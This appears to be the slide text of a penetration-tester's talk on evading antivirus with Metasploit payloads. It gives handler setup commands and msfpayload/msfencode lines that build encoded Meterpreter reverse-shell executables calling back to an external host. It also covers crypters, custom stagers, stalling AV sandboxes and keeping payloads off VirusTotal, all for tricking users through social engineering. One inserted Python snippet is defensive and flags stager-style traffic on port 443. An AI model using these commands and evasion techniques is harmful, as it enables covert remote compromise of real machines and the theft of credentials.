2. Anti-Virus Got Better
Last January I gave a talk on AV evasion.
I showed how to craft a custom Meterpreter
payload.
Some AV products catch that now!
This presentation shows how to get back in
business.
3. Anti-Virus Got Better
A lot of built-in exploits don't work anymore
because of AV.
You now have to re-write exploits yourself.
Example: unprotected Tomcat installations can
be taken over with the tomcat_mgr_deploy
module.
Without AV, you normally get SYSTEM or root.
With AV, you get disappointment.
4. Goals
Aside from bypassing AV for software exploits,
pentesters need a way to conduct social
engineering.
Ideally, we would like a reliable way to generate
EXE files that run Meterpreter when the user is
tricked.
You can write your own custom code, but then
how do you safely and reliably steal hashes,
hijack tokens, etc?
5. Payload Overview
Usually, the EXE doesn't contain Meterpreter
itself.
It's a stager, whose only job is to connect back
to your Metasploit server and execute what it
returns.
For the last two years, pretty much all the
Metasploit stagers get caught, no matter how
much you encode them.
6. Payload Server
The server is set up with:
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
7. IDS/IPS Evasion
An interesting trick to confuse network IDS/IPS
is to encode the payload as it travels over the
network.
One way is to set StageEncoder on the server.
You can use shikata_ga_nai, etc.
Last I checked, this is very slow!
Another way is to use the
windows/meterpreter/reverse_tcp_rc4 payload.
You set the RC4 key to encrypt communications.
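Encoding or RC4-encrypting the stage hides its bytes, but not the shape of the connection. As an added defender-side example (not from the talk), this Python check flags a port-443 flow that does not look like TLS; it assumes, as the page implies, that the handler pushes the stage as soon as the stager connects, before the client sends anything, whereas a real TLS client always speaks first with a ClientHello.

```python
# Added example, not part of the original talk: a minimal "is this really TLS on 443?"
# check over the first bytes of a flow.  Assumptions (not stated on the page): a real
# TLS session opens with a client-sent record whose header is content type 0x16
# (handshake), version 0x03 0x0X, handshake type 0x01 (ClientHello); a reverse_tcp
# handler instead sends the stage right after connect, so the server speaks first.
from dataclasses import dataclass
from typing import List, Tuple

# (direction, payload) in the order the packets were seen; direction is "c2s" or "s2c"
Flow = List[Tuple[str, bytes]]


def looks_like_tls_client_hello(first_client_bytes: bytes) -> bool:
    """True if the client's first record carries a plausible TLS ClientHello header."""
    if len(first_client_bytes) < 6:
        return False
    content_type, major, minor = first_client_bytes[0], first_client_bytes[1], first_client_bytes[2]
    handshake_type = first_client_bytes[5]
    return content_type == 0x16 and major == 0x03 and minor <= 0x03 and handshake_type == 0x01


@dataclass
class Verdict:
    suspicious: bool
    reason: str


def classify_port443_flow(flow: Flow) -> Verdict:
    """Flag a port-443 flow whose first exchange does not behave like TLS."""
    if not flow:
        return Verdict(False, "empty flow")
    first_dir, first_payload = flow[0]
    if first_dir == "s2c":
        # A TLS server never talks first; a reverse_tcp handler does (it pushes the stage).
        return Verdict(True, "server sent data before the client: stager-style flow")
    if not looks_like_tls_client_hello(first_payload):
        return Verdict(True, "client's first bytes are not a TLS ClientHello")
    return Verdict(False, "TLS-shaped flow")


# Constructed sample flows (not real captures).
TLS_FLOW: Flow = [("c2s", bytes.fromhex("160301004a010000460303") + b"\x00" * 40),
                  ("s2c", bytes.fromhex("160303005a020000560303") + b"\x00" * 40)]
STAGER_FLOW: Flow = [("s2c", b"\x00\x10\x00\x00" + b"\xfc\xe8" * 8)]  # handler pushes stage first
ODD_CLIENT_FLOW: Flow = [("c2s", b"GET / HTTP/1.0\r\n\r\n"), ("s2c", b"HTTP/1.0 200 OK\r\n")]

if __name__ == "__main__":
    for name, f in (("tls", TLS_FLOW), ("stager", STAGER_FLOW), ("http", ODD_CLIENT_FLOW)):
        print(name, classify_port443_flow(f))
```

The same shape check applies to the RC4 variant: encrypting the stage changes its bytes, not which side sends first.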
8. Simple Payloads
The most basic way to create an EXE is like
this:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"1.2.3.4", "LPORT"=>"443"}
$ ls -l payload.exe
-rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe
$ file payload.exe
payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
9. Simple Payloads
Up until August 2011, you could bypass AV by
encoding like so:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 R |
msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
10. Simple Payloads
Last year I talked about shellcodeexec.
https://github.com/inquisb/shellcodeexec
The punchline is that it takes alphanumeric-encoded shellcode, stuffs it into memory, and
executes it:
C:\Documents and Settings\root>sce.exe <alphanumeric-encoded shellcode omitted>
11. Formerly Good Payload
Here's how the alphanumeric shellcode is
created:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.2.3.4 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
13. Better Payloads
There is a tool called pyinjector which reimplements the essentials of shellcodeexec in
Python.
It creates a writable and executable memory buffer,
stuffs code into it, and executes it.
You use pyinstaller (http://www.pyinstaller.org/)
to create an EXE.
Available at:
https://www.trustedsec.com/files/pyinjector.zip
14. Better Payloads
There is a tool called Hyperion which encrypts
an EXE with AES-128.
The output EXE brute-forces part of the key on
startup.
http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip
This prevents AV from extracting the key and
decrypting the binary.
The stub code for decryption is static!
It is open source though...
15. Best Payloads
The Veil project is a toolkit for creating
payloads that evade AV.
https://www.veil-evasion.com/
It is a relatively new project, but is actively
maintained and developed.
It currently has 22 payloads.
17. Best Payloads
Veil and others seem very useful, but being
open source is a bit of a weakness when it
comes to AV evasion.
This is the same problem that Metasploit has.
Nothing beats writing something yourself!
Best method is to take what's out there,
customize it, and keep it private.
18. Best Payloads
A blog post on the Veil homepage pointed to
information on how to make your own
Meterpreter stager.
With shellcodeexec, the idea was to launch the
generated stager to connect to the server,
download Meterpreter, and execute it.
shellcodeexec → alphanumeric-encoded stager → Meterpreter
Why not write your own stager from scratch?
19. Best Payloads
Someone showed how to write your own
windows/meterpreter/reverse_tcp equivalent.
https://github.com/rsmudge/metasploit-loader
Basically, you open a TCP connection to the
Metasploit server, throw the bytes returned into
an executable buffer.
Prepend the buffer with a "mov edi, socket_id"
instruction, and jump to it.
Meterpreter will then use the existing TCP session.
20. Best Payloads
How do you customize it?
One of the Metasploit developers mentioned
that AV puts new binaries into a sandbox for
the first N seconds.
Do innocent things like read the registry, read
some config files, compute digits of pi, etc.
Don't sleep to run down the clock!
21. VirusTotal
VirusTotal (http://www.virustotal.com/) lets you
upload binaries to be scanned by 46 AV
products.
It's common knowledge that they pass on
samples to AV vendors.
They know malware authors use it.
Your target can pull down a signature in as little
as one hour.
22. VirusTotal
vt-notify (https://github.com/mubix/vt-notify)
uses the VirusTotal API to check the SHA-1
hash of your payload.
If you don't get your own API key, it uses a
built-in one.
It's been incorporated into Veil.
This probably tips them off that it's malware!
Actually... this functionality as a whole was
probably designed as a trap!
23. Building an AV Lab
The best way to check your payload is by
building your own AV lab.
VirusTotal has 46 products, but how many
corporate environments use "Kingsoft AV"?
Symantec and McAfee seem to have the
overwhelming market share.
Maybe throw in Kaspersky for good measure too...
24. Building an AV Lab
MSDN Operating Systems subscription is $700
for 1 year.
Symantec Small Business Edition costs $60 for
a 3 year subscription for 1 endpoint.
McAfee SaaS Endpoint Protection costs $52.
Make sure the AV products don't phone home!
25. Building an AV Lab
I'm now actively building this lab.
Once it's set up, I'm going to evaluate all these
evasion tools.
If anyone wants to test some payloads, just let
me know!
26. Conclusion
To be a good pentester, you need to know how
to bypass AV.
Many built-in Metasploit modules no longer
work. You have to re-write some or find
alternatives.
The success of your engagement can entirely
depend upon how well you can adapt.
Being a programmer is extremely valuable!